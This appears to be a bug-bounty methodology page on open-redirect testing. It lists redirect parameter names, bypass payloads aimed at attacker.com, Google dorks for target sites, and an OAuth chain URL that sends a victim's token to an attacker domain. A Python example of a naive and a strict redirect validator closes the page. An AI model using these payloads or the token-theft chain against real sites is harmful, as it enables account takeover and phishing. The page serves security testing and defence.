
Open Redirect Testing

Very easy to find, and chains effectively with OAuth for token theft leading to account takeover.

Common Parameter Names

return, return_url, rUrl, cancelUrl, redirect, goto, returnTo, returnUrl,
r_url, redirectTo, redirectUrl, dest, continue, next, window, back

Payloads

\/attacker.com
\attacker.com
//attacker.com
//theirsite@attacker.com
/\/attacker.com
https://attacker.com%3F.theirsite.com/
////attacker.com
/%0D/attacker.com
/%2F/attacker.com
/%5Cattacker.com
//google%E3%80%82com

Encoding tip: Always encode & ? # / \ as %26 %3F %23 %2F %5C to force the browser to decode after the redirect, bypassing server-side filters that check the raw string.

Finding with Google Dorks

site:target.com inurl:redirect=
site:target.com inurl:return_url=
site:target.com inurl:goto=

OAuth Token Theft Chain

/login?client_id=123&redirect_url=https://target.com/oauth/callback?goto=https://attacker.com/

The OAuth token is appended to the redirect URL. If the redirect goes to an attacker-controlled domain, the token lands in the attacker's server logs = account takeover.

Bypass Techniques

  • Browser autocorrect – /attacker.com may be normalized by the browser
  • Flawed validator logic – validator checks only if their domain is a substring: https://attacker.com?x=theirsite.com
  • Data URLs – data:text/html;base64,…
  • URL decoding – try encoded slashes %2F%2Fattacker.com
  • Combining techniques – chain encoding + partial domain match

Escalation

  • Chain with OAuth: redirect_uri bypass = token theft = account takeover
  • Use as SSRF bypass – open redirect on target used to reach internal services
  • Phishing – bounce through trusted domain to attacker page

See Also

  • SSRF Testing
  • Bug Chaining
  • TBHM Auth & Session
  • Methodology Index
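The substring-match flaw and the encoding tricks above, shown from the defender's side as an added example (not code from the original page): a naive validator beside a strict one, run against the payloads listed here. theirsite.com and the allowlist are constructed stand-ins for the application's own host.

```python
"""Open-redirect target validation: the flawed substring check beside a strict one.

Added example for this page, not code from the original; "theirsite.com" is a
constructed stand-in for the application's own host.
"""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"theirsite.com"}  # constructed placeholder for the real allowlist

# Payloads listed on this page, with "theirsite.com" as the constructed own-host value
PAGE_PAYLOADS = [
    "\\/attacker.com", "\\attacker.com", "//attacker.com",
    "//theirsite@attacker.com", "/\\/attacker.com",
    "https://attacker.com%3F.theirsite.com/", "////attacker.com",
    "/%0D/attacker.com", "/%2F/attacker.com", "/%5Cattacker.com",
    "//google%E3%80%82com", "https://attacker.com?x=theirsite.com",
    "data:text/html;base64,SGVsbG8=", "%2F%2Fattacker.com",
]


def naive_is_safe(target: str) -> bool:
    """The flawed validator described above: passes if our domain appears anywhere."""
    return "theirsite.com" in target


def strict_is_safe(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Accept only a same-site relative path or an https URL whose host is allowlisted."""
    if not target:
        return False
    # Decode once so %2F / %5C are judged as the slashes the browser sees after the hop
    decoded = unquote(target)
    # Browsers normalise backslashes to '/' and drop CR/LF; reject rather than reason about it
    if any(c == "\\" or ord(c) < 0x20 for c in decoded):
        return False
    parts = urlsplit(decoded)
    if not parts.scheme and not parts.netloc:
        # Relative target: exactly one leading slash; "//host" would be scheme-relative
        return decoded.startswith("/") and not decoded.startswith("//")
    # Absolute target: https only, no userinfo, exact hostname match (not substring)
    return (
        parts.scheme == "https"
        and parts.username is None
        and parts.hostname in allowed_hosts
    )
```

Every payload on this page fails strict_is_safe, while naive_is_safe still waves through the two that merely mention theirsite.com somewhere in the string.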
zseano/open_redirects.1778749098.txt.gz · Last modified: by drew